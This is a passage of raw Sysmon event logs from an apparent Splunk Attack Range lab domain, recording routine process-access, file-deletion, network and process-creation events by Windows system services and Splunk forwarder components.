07:53:41.447{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:41.447{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:41.447{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1500-00000000CF01}1260C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:42.912{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCC195C6303F9C3C15268215C2C6A2EC,SHA256=7D48D409A0C6EDD4E4B3FE4CBEF9659EEA063B9FBD350AC13B712D2049872F9B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807843Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:41.206{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57283-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807842Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:42.339{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48EDE0A5AF55F52E177381BFFA4BED4E,SHA256=716011DC70F2F89C2FD082A56CF0930BD7183D9FA0411F1FAFD13E5344857379,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:34.689{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51043-false10.0.1.12-8000- 23542300x80000000000000001049332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:43.912{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAA3BB81520F79F05B1453384204D50D,SHA256=6B8DCC4DF250133BAAF29BCAE128F7923844CB3EC2FAE583CEE6F6DFA60A93D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807844Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:43.386{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62CE98414CDC0ED6D90CA7683D379BCE,SHA256=50BE329E848C47EDDCFEA441672730506B36A3F1FA6626411ABEB8F276A5ED17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:44.949{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE0FE3993B2D45FF9FC656A8076F91A7,SHA256=4DD1723E4161B860AB4B5922FFD82C6A2A1B2800F6BCAA29F5EDE50668C001AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807845Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:44.433{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCD8AE90C4270B3466E7F9596F3CE20F,SHA256=B6B978AFC3F73B97F47FD4C74B61219EACA45A1B3CFFB7DFCD657756B49373CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:45.964{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8B9A1DC7AE983C93A2A066465DA7F5D,SHA256=F453A0D83814691472AD0D5CA33BD7F111DE2F800AF20681D9746A4371EDC3DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807846Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:45.433{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F04FE726D4FFC7A8BC0A47F193F14AC7,SHA256=8CCFD5E6B5B6365077F3BD156D5A26907DDDE72C09DEF859DD631003648C73DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:46.994{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94F4D3B8114B0DC162643A3CBB8BBBAA,SHA256=841D2E5D42F4D0C4270F19DF0F535ECAE76C0E2530CC05464B2AB22E76C6315E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807847Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:46.464{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A37B4B3592CC32CB42E64C0662E85D97,SHA256=E54AE6B34980F198DDB718F95687E85E40A9BA4655955EE4F7ED6E52B51299CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:47.996{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D3E2BE4D453E24BC1CB799C963F7577,SHA256=CC5EE2B91FDDDD599B1FF048E98B6EF113BA9369DC0A1428436886CF81C59482,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807848Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:47.480{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E200021D28692A3B6AC25EE0A38878A1,SHA256=FEE9A6A3B24124299D122E04C9859D548C496D1ACB17AAD224617ED5B719D869,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807850Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:47.190{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57284-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807849Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:48.512{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4C6739D8F07FF0686B9EB02D6B20283,SHA256=F176F1553E25D7B2A9ADA05179A8D78A154FF3E93BEC92C5F4D1A636A19CE553,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:40.652{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51044-false10.0.1.12-8000- 23542300x8000000000000000807851Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:49.540{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62266F6335D1C6C00A092B12BF1C408D,SHA256=C16197B589A565A73978267915EA9768333E8AB8957DF87485CC7A077BA77BA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:49.011{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=193D61DAB367259523A0D8CD40653668,SHA256=D163286000687A2F9F2BDABA9B5B1E39075F8F096C0D22F4033F639A3A6CEC8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807852Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:50.558{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2E0B5DCC3283E9E0C0F933265DF9EA8,SHA256=1B33390958179A9266F0865E8BBAAD576D081971A4B7B08C6CCF4186D2AD0408,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049355Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.932{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F50E-60EB-467D-00000000CF01}8156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.932{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.932{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.932{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.932{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F50E-60EB-467D-00000000CF01}8156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.932{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.932{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F50E-60EB-467D-00000000CF01}8156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.927{466BC892-F50E-60EB-467D-00000000CF01}8156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001049347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.247{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F50E-60EB-457D-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.232{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.232{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.232{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.232{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.232{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F50E-60EB-457D-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:50.232{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F50E-60EB-457D-00000000CF01}4256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program 